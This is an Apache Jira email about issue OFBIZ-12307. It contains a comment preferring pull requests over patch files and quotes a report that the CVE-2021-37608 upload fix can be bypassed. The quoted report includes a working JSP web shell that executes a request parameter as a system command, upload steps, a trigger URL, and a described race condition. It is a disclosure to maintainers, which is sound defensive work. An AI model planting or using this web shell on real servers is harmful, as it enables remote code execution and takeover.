[
https://issues.apache.org/jira/browse/OFBIZ-12307?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17447869#comment-17447869
]
Pierre Smits commented on OFBIZ-12307:
--------------------------------------
Good morning Jacques,
Of course... A patch file uploaded by a contributor can be taken by a third
party and included in his/her/their fork and presented/committed there as
his/her/their work. This is unfavourable as it would not show up as the
contribution from the contributor to the OFBiz project. It should therefore be
discouraged to upload patch files (or ask for), but rather encouraged to submit
PRs.
> CVE-2021-37608 vulnerability bypass
> -----------------------------------
>
> Key: OFBIZ-12307
> URL: https://issues.apache.org/jira/browse/OFBIZ-12307
> Project: OFBiz
> Issue Type: Sub-task
> Affects Versions: 17.12.08
> Reporter: thiscodecc
> Assignee: Jacques Le Roux
> Priority: Major
> Labels: security
> Fix For: Release Branch 17.12, 18.12.01
>
> Attachments: OFBIZ-12307-addAdditionalViewForProduct.patch,
> image-2021-11-22-18-14-50-370.png
>
>
> The patch
> ([https://github.com/apache/ofbiz-framework/commit/8d49af4/#diff-75dac0d18a6bc59554dded12b9b01563651e05a2df6cede9d7d3e2b42b7fc382])
> for the CVE-2021-37608 vulnerability can be bypassed.
> Verification process:
> 1.Create a new xx.png.jsp file.
> The content of the xx.png.jsp file is:
> <%
> java.io.InputStream in =
> Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
> int a = -1;
> byte[] b = new byte[2048];
> out.print("<pre>");
> while((a=in.read(b))!=-1)
> { out.println(new String(b)); }
> out.print("</pre>");
> %>
> 2.Upload the xx.png.jsp file directly
> 3.Visit the jsp Trojan address
> "https://localhost:8443/images/products/management/WG-9943/xx.png.jsp?i=whoami";
>
> I carefully analyzed the code of this logic again and found multiple problems.
> the reasons for the vulnerabilities are:
> Here will upload the file first.
>
> [https://github.com/apache/ofbiz-framework/blob/trunk/applications/product/src/main/java/org/apache/ofbiz/product/imagemanagement/ImageManagementServices.java#L159-#L162]
> When verifying the file name, because the file name is "xx.png.jsp", so
> "wrongFile=true".
>
> [https://github.com/apache/ofbiz-framework/blob/trunk/framework/security/src/main/java/org/apache/ofbiz/security/SecuredUpload.java#L128]
> Because "wrongFile=true", isValidFile method will exit early.
>
> [https://github.com/apache/ofbiz-framework/blob/trunk/framework/security/src/main/java/org/apache/ofbiz/security/SecuredUpload.java#L137]
> So that the malicious file is not deleted.
>
> [https://github.com/apache/ofbiz-framework/blob/trunk/framework/security/src/main/java/org/apache/ofbiz/security/SecuredUpload.java#L215]
> The above is the reason for the vulnerability mentioned in my last email.
> I also found a new problem. The code logic used to verify the file upload is
> to upload the file first and then delete it after judging that it is
> malicious.This will create a race condition loophole.
> Use multiple threads to upload the xxx.jsp file, and then keep accessing the
> xxx.jsp file. Since ofbiz adopts the verification rule of uploading and then
> deleting, then xxx.jsp will be uploaded successfully, and ofbiz has not
> successfully deleted "xxx.jsp". The file, "xxx.jsp" file was requested by the
> attacker first. This will create an arbitrary file upload vulnerability.
--
This message was sent by Atlassian Jira
(v8.20.1#820001)
![https://localhost:8443/images/products/management/WG-9943/xx.png.jsp?i=whoami"](https://localhost:8443/images/products/management/WG-9943/xx.png.jsp?i=whoami"){kind=link}